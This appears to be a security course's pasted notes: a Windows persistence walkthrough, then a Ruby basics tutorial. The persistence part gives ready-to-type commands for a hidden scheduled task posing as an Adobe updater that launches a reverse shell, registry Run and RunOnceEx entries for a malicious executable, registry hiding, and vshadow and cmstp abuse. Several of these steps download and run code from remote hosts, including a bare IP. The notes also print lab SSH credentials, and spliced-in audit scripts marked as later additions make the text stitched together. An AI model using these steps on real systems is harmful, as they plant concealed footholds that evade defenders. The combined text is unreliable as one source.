joemccray

Attack & Defense 2020

Sep 16th, 2019
  1. ################################
  2. # Attack Environment Deployers #
  3. ################################
  4. https://github.com/mantvydasb/Red-Team-Infrastructure-Automation
  5.  
  6.  
  7.  
  8.  
  9. #################
  10. # Lab Deployers #
  11. #################
  12. https://github.com/jaredhaight/PowerShellClassLab
  13. https://github.com/outflanknl/Invoke-ADLabDeployer
  14. https://github.com/AutomatedLab/AutomatedLab
  15.  
  16.  
  17.  
  18.  
  19. ###############
  20. # Persistence #
  21. ###############
  22. https://rastamouse.me/2018/03/a-view-of-persistence/
  23. https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
  24. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  25. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  26.  
  27.  
  28.  
  29.  
  30. ####################
  31. # Lateral Movement #
  32. ####################
  33.  
  34.  
  35. ###########################
  36. # Bypassing EDR Solutions #
  37. ###########################
  38. https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
  39. https://github.com/vysecurity/morphHTA
  40. https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
  41.  
  42.  
  43.  
  44. ###############################
  45. # Device Guard Check & Bypass #
  46. ###############################
  47. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1
  48.  
  49.  
  50. ######################
  51. # EDR Check & Bypass #
  52. ######################
  53. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1
  54.  
  55.  
  56.  
  57.  
  58. ###############
  59. # Persistence #
  60. ###############
  61.  
  62.  
  63. ---- Scheduled Task Based Persistence ----
  64. 1. Scheduled task based on most commonly occurring event ID
  65. https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1
  66.  
  67.  
  68.  
  69. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  70.  
  71. ---------------------------Type This-----------------------------------
  72. mkdir c:\persistence
  73.  
  74. cd c:\persistence
  75.  
  76. Get-ExecutionPolicy
  77. Set-ExecutionPolicy Unrestricted -Force
  78.  
  79. $client = new-object System.Net.WebClient
  80. $client.DownloadFile("https://raw.githubusercontent.com/TestingPens/MalwarePersistenceScripts/master/user_event_persistence.ps1","c:\persistence\user_event_persistence.ps1")
  81.  
  82. dir
  83.  
  84. .\user_event_persistence.ps1
  85. -------------------------------------------------------------------------
  86.  
  87.  
  88.  
  89. - Alternative method 1:
  90. -----------------------
  91. As an administrator, create a basic task with the following information:
  92.  
  93. Name: Adobe Systems Incorporated
  94.  
  95. Description: This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.
  96.  
  97.  
  98.  
  99. Task Trigger: Daily
  100.  
  101. Start a program: C:\Windows\System32\calc.exe
  102.  
  103.  
  104.  
  105. - Alternative method 2:
  106. -----------------------
  107. In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml".
  108.  
  109. - Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on the target machine:
  110. - Adapt <UserId></UserId> to the SID of the current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
  111. - Adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
  112. - This scheduled task triggers on an event; it can be changed to regular calls (e.g. once an hour)
  113.  
  114. --------------------------------
  115. <?xml version="1.0" encoding="UTF-16"?>
  116. <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  117. <RegistrationInfo>
  118. <Author>Adobe Systems Incorporated</Author>
  119. <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  120. </RegistrationInfo>
  121. <Triggers>
  122. <EventTrigger>
  123. <Enabled>true</Enabled>
  124. <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  125. </EventTrigger>
  126. </Triggers>
  127. <Principals>
  128. <Principal id="Author">
  129. <UserId>S-1-5-18</UserId>
  130. <RunLevel>LeastPrivilege</RunLevel>
  131. </Principal>
  132. </Principals>
  133. <Settings>
  134. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  135. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  136. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
  137. <AllowHardTerminate>true</AllowHardTerminate>
  138. <StartWhenAvailable>true</StartWhenAvailable>
  139. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
  140. <IdleSettings>
  141. <StopOnIdleEnd>true</StopOnIdleEnd>
  142. <RestartOnIdle>false</RestartOnIdle>
  143. </IdleSettings>
  144. <AllowStartOnDemand>true</AllowStartOnDemand>
  145. <Enabled>true</Enabled>
  146. <Hidden>true</Hidden>
  147. <RunOnlyIfIdle>false</RunOnlyIfIdle>
  148. <WakeToRun>false</WakeToRun>
  149. <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
  150. <Priority>7</Priority>
  151. </Settings>
  152. <Actions Context="Author">
  153. <Exec>
  154. <Command>C:\Windows\System32\calc.exe</Command>
  155. </Exec>
  156. </Actions>
  157. </Task>
  158.  
  159. ---------------------------
  160.  
  161. Now let's create the scheduled task
  162. ---------------------------Type This-----------------------------------
  163. schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
  164. -----------------------------------------------------------------------
  165.  
  166.  
  167. Sit back and wait for the task to trigger. By the way, we got the correct XML file format by creating a scheduled task and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.
  168.  
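
Defender's view of the task definition above, as an added example that is not part of the original notes: a Ruby triage script for an exported task XML. The sample XML is constructed from the definition above; the helper names and the author/path heuristic are assumptions.

```ruby
# Added example, not part of the original notes. SAMPLE_TASK_XML is
# constructed from the task definition shown above; helper names are
# hypothetical.

SAMPLE_TASK_XML = <<~'XML'
  <?xml version="1.0" encoding="UTF-16"?>
  <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
    <RegistrationInfo>
      <Author>Adobe Systems Incorporated</Author>
    </RegistrationInfo>
    <Triggers>
      <EventTrigger>
        <Enabled>true</Enabled>
        <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      </EventTrigger>
    </Triggers>
    <Principals>
      <Principal id="Author">
        <UserId>S-1-5-18</UserId>
        <RunLevel>LeastPrivilege</RunLevel>
      </Principal>
    </Principals>
    <Settings>
      <Hidden>true</Hidden>
    </Settings>
    <Actions Context="Author">
      <Exec>
        <Command>C:\Windows\System32\calc.exe</Command>
      </Exec>
    </Actions>
  </Task>
XML

LOCAL_SYSTEM_SID = 'S-1-5-18'

# Task Scheduler exports are UTF-16LE with a byte order mark; convert the raw
# bytes (e.g. from File.binread) to UTF-8 before matching.
def decode_task_bytes(bytes)
  bytes.dup.force_encoding('UTF-16LE').encode('UTF-8').sub(/\A\uFEFF/, '')
end

# Inner text of the first <tag> element, or nil. Regex extraction is enough
# for triage of this flat format; it is not a general XML parser.
def element_text(xml, tag)
  name = Regexp.escape(tag)
  match = xml.match(%r{<#{name}(?:\s[^>]*)?>(.*?)</#{name}>}m)
  match && match[1].strip
end

def unescape_xml(text)
  text.gsub('&lt;', '<').gsub('&gt;', '>').gsub('&quot;', '"').gsub('&amp;', '&')
end

# Returns [code, message] pairs, one per trait worth an analyst's attention.
def audit_task(xml)
  findings = []
  author   = element_text(xml, 'Author').to_s
  command  = element_text(xml, 'Command').to_s
  settings = element_text(xml, 'Settings').to_s

  findings << [:hidden, 'task is marked Hidden'] if element_text(settings, 'Hidden') == 'true'

  if (subscription = element_text(xml, 'Subscription'))
    query    = unescape_xml(subscription)
    event_id = query[/EventID\s*=\s*(\d+)/, 1]
    log      = query[/Path="([^"]+)"/, 1]
    findings << [:event_trigger, "runs on event ID #{event_id} in the #{log} log"]
  end

  # Heuristic (assumption): a task that names a third-party vendor as its
  # author should run a binary whose path names that vendor.
  vendor = author[/\A\w+/]
  if vendor && vendor.casecmp('microsoft') != 0 && !command.downcase.include?(vendor.downcase)
    findings << [:author_path_mismatch, "author '#{author}' but action runs #{command}"]
  end

  if element_text(xml, 'UserId') == LOCAL_SYSTEM_SID
    findings << [:runs_as_system, 'principal is LocalSystem (S-1-5-18)']
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  audit_task(SAMPLE_TASK_XML).each { |code, message| puts "#{code}: #{message}" }
end
```
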
  169.  
  170.  
  171.  
  172. ---- Registry Based Persistence ---
  173. 1. RunOnce key persistence trick
  174. Reference:
  175. https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
  176.  
  177.  
  178.  
  179. 1. Upload your executable to the system
  180. 2. Add the registry entry (requires admin privileges):
  181. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"
  182.  
  183. Note:
  184. The Beacon/shell may prevent the user from logging in, because the logon hangs on the Beacon executable. Solution: spawn a new Beacon and exit the initial Beacon.
  185.  
  186.  
  187.  
  188.  
  189.  
  190. 2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
  191. Let's try this:
  192. https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
  193.  
  194.  
  195. 2. Hide Reg
  196. Let's try this code out:
  197. https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741
  198.  
  199. Reference:
  200. https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
  201.  
  202.  
  203.  
  204.  
  205. Get the following two files
  206. ---------------------------
  207. https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
  208. https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1
  209.  
  210. In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (e.g. 'cmd /c calc.exe'). It will be invisible to regedit and PowerShell.
  211.  
  212. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  213.  
  214. ---------------------------Type This-----------------------------------
  215. mkdir c:\persistence
  216.  
  217. cd c:\persistence
  218.  
  219. (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistence\PSReflect.ps1")
  220.  
  221. (new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistence\PSReflect-RegHide.ps1")
  222.  
  223. .\PSReflect-RegHide.ps1
  224. -------------------------------------------------------------------------
  225.  
  226.  
  227.  
  228. Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
  229. ---------------------------Type This-----------------------------------
  230. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  231. Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  232. -----------------------------------------------------------------------
  233. However, it will still be visible to other tools, e.g. the Sysinternals Autoruns tool.
  234.  
  235.  
  236.  
  237. 3. VShadow
  238. Let's try this out:
  239. https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
  240.  
  241.  
  242.  
  243. 1. Download vshadow.exe, which is included in the Windows SDK
  244. Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
  245. Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
  246. 2. Upload the vshadow.exe to the target machine
  247. 3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")
  248.  
  249.  
  250. ---------------------------Type This-----------------------------------
  251. mkdir c:\persistence
  252.  
  253. cd c:\persistence
  254.  
  255. $client = new-object System.Net.WebClient
  256. $client.DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe","c:\persistence\win10_vshadow_x64.exe")
  257.  
  258.  
  259. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistence\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
  260. -----------------------------------------------------------------------
  261.  
  262.  
  263. 4. INF-SCT
  264. Let's try this out:
  265. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  266. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  267.  
  268.  
  269. Technique 1: CMSTP
  270. ------------------
  271. Create "c:\persistence\cmstp.inf" with the following content:
  272. -----------------------------------
  273. ;cmstp.exe cmstp.inf
  274.  
  275. [version]
  276. Signature=$chicago$
  277. AdvancedINF=2.5
  278.  
  279. [DefaultInstall_SingleUser]
  280. UnRegisterOCXs=UnRegisterOCXSection
  281.  
  282. [UnRegisterOCXSection]
  283. %11%\scrobj.dll,NI,c:\persistence\test.sct
  284.  
  285. [Strings]
  286. AppAct = "SOFTWARE\Microsoft\Connection Manager"
  287. ServiceName="Yay"
  288. ShortSvcName="Yay"
  289. ----------------------------------------------------
  290.  
  291.  
  292.  
  293. Get a sample sct payload (e.g. https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct) and store it in "c:\persistence\test.sct".
  294.  
  295.  
  296. ---------------------------Type This-----------------------------------
  297. mkdir c:\persistence
  298.  
  299. cd c:\persistence
  300.  
  301. $client = new-object System.Net.WebClient
  302. $client.DownloadFile("https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct","c:\persistence\test.sct")
  303.  
  304. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d C:\Windows\System32\cmstp.exe\" /s C:\persistence\cmstp.inf"
  305. -----------------------------------------------------------------------
  306.  
  307.  
  308. Reboot your machine.
  309. Your sct payload will be executed upon reboot. HOWEVER, because a Windows binary executes it, the Sysinternals Autoruns tool will not show it unless you untick the "Options->Hide Windows Entries" option.
  310.  
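
The Run and RunOnceEx entries created in the steps above all launch their real payload through another program, which is why a default Autoruns view can miss them. As an added example (not part of the original notes), this Ruby script reads saved `reg query` output and reports those entries together with the payload they lead to; the sample output is constructed from the values on this page, and the rule and helper names are assumptions.

```ruby
# Added example, not part of the original notes. SAMPLE_REG_QUERY is a
# constructed sample in the layout printed by `reg query`, using the values
# from the steps above plus one ordinary entry for contrast.

SAMPLE_REG_QUERY = <<~'OUT'

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
      VSSBackup    REG_EXPAND_SZ    c:\persistence\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:
      oemkey    REG_SZ    C:\Windows\System32\cmstp.exe /s C:\persistence\cmstp.inf

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001
      Line1    REG_SZ    ||c:\path\to\malicious.exe
OUT

Finding = Struct.new(:key, :name, :rule, :payload)

# Each rule captures the thing that actually runs: the -exec target for
# vshadow, the INF file for a silent cmstp install.
PROXY_RULES = [
  [:vshadow_exec, /vshadow.*?-exec=(\S+)/i],
  [:cmstp_inf,    %r{cmstp\.exe"?\s+.*?/s\s+"?([^"\s]+\.inf)}i]
].freeze

# reg query prints: four spaces, value name, four spaces, type, four spaces, data.
VALUE_LINE = /\A\s+(.+?)\s{4}(REG_\w+)\s{4}(.*)\z/

# Returns [rule, payload] for a suspicious value, or nil for an ordinary one.
def classify(key, data)
  # Any value under RunOnceEx is reported; the leading "||" is stripped.
  return [:runonceex, data.sub(/\A\|\|/, '')] if key =~ /\\RunOnceEx(\\|\z)/i

  PROXY_RULES.each do |rule, pattern|
    match = data.match(pattern)
    return [rule, match[1]] if match
  end
  nil
end

def audit_run_keys(reg_query_output)
  key = nil
  reg_query_output.each_line.with_object([]) do |raw, findings|
    line = raw.chomp
    if line.start_with?('HKEY_')
      key = line.strip
    elsif key && (m = line.match(VALUE_LINE))
      rule, payload = classify(key, m[3].strip)
      findings << Finding.new(key, m[1], rule, payload) if rule
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  audit_run_keys(SAMPLE_REG_QUERY).each do |f|
    puts "#{f.rule}: #{f.key}\\#{f.name} -> #{f.payload}"
  end
end
```
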
  311.  
  312.  
  313. 5. GPScript.exe
  314. Let's try this out:
  315. https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  316.  
  317.  
  318.  
  319. ---- Cobalt Strike Aggressor Persistence Scripts ----
  320. https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
  321. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
  322. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna
  323.  
  324.  
  325.  
  326.  
  327.  
  328. -------------------------------------------------------------------------------------------------------------
  329.  
  330. ############################
  331. # Day 2: Ruby Fundamentals #
  332. ############################
  333.  
  334. - I prefer to use Putty to SSH into my Linux host.
  335. - You can download Putty from here:
  336. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  337.  
  338. Here is the information to put into putty
  339.  
  340. Host Name: 149.28.201.171
  341. protocol: ssh
  342. port: 22
  343. username: secureninja
  344. password: secureninja!!
  345.  
  346. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  347. scientist and programmer from Japan. It is a cross-platform dynamic language.
  348.  
  349. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  350. on Rails is a framework that is written in Ruby.
  351.  
  352. - Ruby's file name extensions are .rb and .rbw.
  353.  
  354. - The official website of this language: www.ruby-lang.org.
  357.  
  358.  
  359. - Ruby has an interactive shell called the Ruby Shell (irb).
  360.  
  361.  
  362. - Open up the interactive console and play around.
  363.  
  364. ---------------------------Type This-----------------------------------
  365. irb
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369. - Math, Variables, Classes, Creating Objects and Inheritance
  370.  
  371.  
  372. Ruby supports the following arithmetic operators:
  373. Addition operator (+) — 10 + 23
  374. Subtraction operator (-) — 1001 - 34
  375. Multiplication operator (*) — 5 * 5
  376. Division operator (/) — 12 / 2
  377.  
  378.  
  379.  
  380. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  381. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  382. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  383.  
  384. ---------------------------Type This-----------------------------------
  385. x = 25
  386. x + 30
  387. y = 69
  388. y+33
  389. -----------------------------------------------------------------------
  390.  
  391.  
  392.  
  393. - Let's look at creating classes and creating objects.
  394.  
  395. - Here, the name of the class is Attack. An object has its properties and methods.
  396.  
  397.  
  398. ---------------------------Type This-----------------------------------
  399. class Attack
  400. attr_accessor :of, :sqli, :xss
  401. end
  402. -----------------------------------------------------------------------
  403.  
  404.  
  405. What is nil?
  406. Reference:
  407. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  408.  
  409. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  410.  
  411. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  412.  
  413. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  414.  
  415.  
  416.  
  417.  
  418.  
  419. # Now that we have created the classes let's create the objects
  420. ---------------------------Type This-----------------------------------
  421. first_attack = Attack.new
  422. first_attack.of = "stack"
  423. first_attack.sqli = "blind"
  424. first_attack.xss = "dom"
  425. puts first_attack.of
  426. puts first_attack.sqli
  427. puts first_attack.xss
  428. -----------------------------------------------------------------------
  429.  
  430.  
  431.  
  432.  
  433. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  434. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  435. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  436. programming life easier by maximizing code reuse.
  437.  
  438.  
  439. ---------------------------Type This-----------------------------------
  440. class Exploitframeworks
  441. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  442. end
  443. class Metasploit < Exploitframeworks
  444. end
  445. class Canvas < Exploitframeworks
  446. end
  447. class Coreimpact < Exploitframeworks
  448. end
  449. class Saint < Exploitframeworks
  450. end
  451. class Exploitpack < Exploitframeworks
  452. end
  453. -----------------------------------------------------------------------
  454.  
  455.  
  456.  
  457.  
  458. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  459.  
  460. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  461.  
  462. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  463. it will print this string: "We are Learning how to PenTest"
  464.  
  465. - An object named 'joe' is created, which is used to call the method.
  466.  
  467.  
  468. ---------------------------Type This-----------------------------------
  469. class Msfnl
  470. def learning
  471. puts "We are Learning how to PenTest"
  472. end
  473. end
  474. -----------------------------------------------------------------------
  475.  
  476. #Now let's define an object for our Method
  477.  
  478. ---------------------------Type This-----------------------------------
  479. joe = Msfnl.new
  480. joe.learning
  481. -----------------------------------------------------------------------
  482.  
  483.  
  484.  
  485. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  486. calling the puts() function, we are sending a string value to the function. This string value is used by the
  487. function to perform some particular operations.
  488.  
  489. puts("Pentesting")
  490.  
  491.  
  492. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  493. explain some useful string functions with an example.
  494.  
  495. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  496. reverse function reverses a string. The following example demonstrates how to use the string functions.
  497.  
  498. ---------------------------Type This-----------------------------------
  499. 55.class
  500. "I Love Programming".class
  501. "I Love Pentesting".length
  502. "Pown that box".upcase
  503. "Love" + "To Root Boxes"
  504. "evil".reverse
  505. "evil".reverse.upcase
  506. -----------------------------------------------------------------------
  507.  
  508.  
  509. - Expressions and shortcuts: in the example below, 'a' is an operand, '3' is an operand, '=' is
  510. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. The following are
  511. examples of some expressions.
  512.  
  513. ---------------------------Type This-----------------------------------
  514. a = 3
  515. b = 6
  516. a+b+20
  517. d = 44
  518. f = d
  519. puts f
  520. -----------------------------------------------------------------------
  521.  
  522.  
  523.  
  524.  
  525.  
  526. - Shortcuts: += and *= are the shortcuts. These operators are also called abbreviated
  527. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  528. statements to understand the shortcuts.
  529.  
  530. ---------------------------Type This-----------------------------------
  531. g = 70
  532. g = g+44
  533. g += 33
  534. -----------------------------------------------------------------------
  535.  
  536.  
  537. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  538.  
  539.  
  540.  
  541. ---------------------------Type This-----------------------------------
  542. g *= 3
  543. -----------------------------------------------------------------------
  544.  
  545.  
  546. - In the above statement, g is multiplied by 3 and then assigned to g.
  547.  
  548. - Example
  549.  
  550. - Comparison Operators, Loops, Data Types, and Constants
  551.  
  552. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  553. how to use the following comparison operators.
  554.  
  555. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  556. variable or constant. If it's less than the other, the 'less than' operator returns true.
  557.  
  558. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  559. or constant. If it's equal to the other, the 'equal to' operator returns true.
  560.  
  561. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  562. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  563.  
  564. ---------------------------Type This-----------------------------------
  565. numberofports = 55
  566. puts "number of ports found during scan" if numberofports < 300
  567. numberofports = 400
  568. puts "number of ports found during scan" if numberofports < 300
  569. puts "number of ports found during scan" if numberofports == 300
  570. puts "number of ports found during scan" if numberofports != 300
  571. -----------------------------------------------------------------------
  572.  
  573.  
  574.  
  575. Example
  576.  
  577.  
  578. - The 'OR' operator and the 'unless' keyword: the symbol '||' represents the logical 'OR' operator.
  579.  
  580. - This operator is generally used to combine multiple conditions.
  581. - In the case of two conditions, if both or either of the conditions is true, the 'OR' operator returns true. Consider the
  582. following example to understand how this operator works.
  584.  
  585. ---------------------------Type This-----------------------------------
  586. ports = 100
  587. puts "number of ports found on the network" if ports<100 || ports>200
  588. puts "number of ports found on the network" if ports<100 || ports>75
  589. -----------------------------------------------------------------------
  590.  
  591. # unless
  592.  
  593. ---------------------------Type This-----------------------------------
  594. portsbelow1024 = 50
  595. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  596. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  597. puts "If the ports are below 1024" unless portsbelow1024 < 20
  598. -----------------------------------------------------------------------
  599.  
  600. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  601.  
  602.  
  603.  
  604. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  605.  
  606. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  607.  
  608. ---------------------------Type This-----------------------------------
  609. 10.times do puts "infosecaddicts" end
  610. -----------------------------------------------------------------------
  611.  
  612. # Or use the curly braces
  613.  
  614. ---------------------------Type This-----------------------------------
  615. 10.times {puts "infosecaddicts"}
  616. -----------------------------------------------------------------------
  617.  
  618.  
  619. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  620. working with different data types. Data type conversion is also known as type casting.
  621.  
  622.  
  623.  
  624. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  625. change the value of a constant, you will see a warning message.
  626.  
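
Data type conversion and constants, shown together as an added example that is not part of the original notes: converting port numbers read as text. It goes slightly beyond the two paragraphs above by contrasting the lenient to_i with the strict Integer(), and a reassigned constant (warning only) with a frozen one; all names are assumptions.

```ruby
# Added example, not part of the original notes; all names are hypothetical.

# Constants start with a capital letter. Assigning VALID_PORTS a second time
# only prints "already initialized constant"; it does not stop the program.
VALID_PORTS = (1..65_535).freeze

# A constant holding an Array can still be changed in place (<<, push, []=)
# without any warning unless the object is frozen.
DEFAULT_PORTS = [21, 22, 80].freeze

# to_i never fails: it converts the leading digits and ignores the rest,
# and returns 0 when there are no leading digits at all.
def lenient_port(text)
  text.to_s.to_i
end

# Integer(text, 10) raises ArgumentError on anything that is not a whole
# base-10 number; passing the base also stops "021" being read as octal.
def strict_port(text)
  port = Integer(text.to_s, 10)
  raise ArgumentError, "port out of range: #{port}" unless VALID_PORTS.cover?(port)

  port
end

# Split a comma-separated list into converted ports and rejected inputs.
def parse_port_list(csv)
  accepted = []
  rejected = []
  csv.split(',').map(&:strip).each do |item|
    begin
      accepted << strict_port(item)
    rescue ArgumentError
      rejected << item
    end
  end
  [accepted, rejected]
end

# Mutating the frozen constant raises FrozenError instead of silently
# changing the defaults for the rest of the program.
def defaults_mutable?
  DEFAULT_PORTS << 443
  true
rescue FrozenError
  false
end

if __FILE__ == $PROGRAM_NAME
  inputs = %w[21 22 80abc 70000 ftp]
  puts "to_i:      #{inputs.map { |s| lenient_port(s) }.inspect}"
  accepted, rejected = parse_port_list(inputs.join(','))
  puts "Integer(): accepted #{accepted.inspect}, rejected #{rejected.inspect}"
  puts "defaults mutable? #{defaults_mutable?}"
end
```
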
  627.  
  628.  
  629.  
  630. - Multiple Line String Variable, Interpolation, and Regular Expressions
  631.  
  632. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  633.  
  634. ---------------------------Type This-----------------------------------
  635. infosecaddicts = <<mark
  636. welcome
  637. to the
  638. best
  639. metasploit
  640. course
  641. on the
  642. market
  643. mark
  644. puts infosecaddicts
  645. -----------------------------------------------------------------------
  646.  
  647.  
  648. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  649. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  650. Examine the following example to understand how interpolation works in Ruby.
  651.  
  652. References:
  653. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  654.  
  655.  
  656. ---------------------------Type This-----------------------------------
  657. a = 4
  658. b = 6
  659. puts "a * b = a*b"
  660. puts " #{a} * #{b} = #{a*b} "
  661. person = "Joe McCray"
  662. puts "IT Security consultant person"
  663. puts "IT Security consultant #{person}"
  664. -----------------------------------------------------------------------
  665.  
  666. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  667.  
  668.  
  669.  
  670.  
  671.  
  672. - Character classes
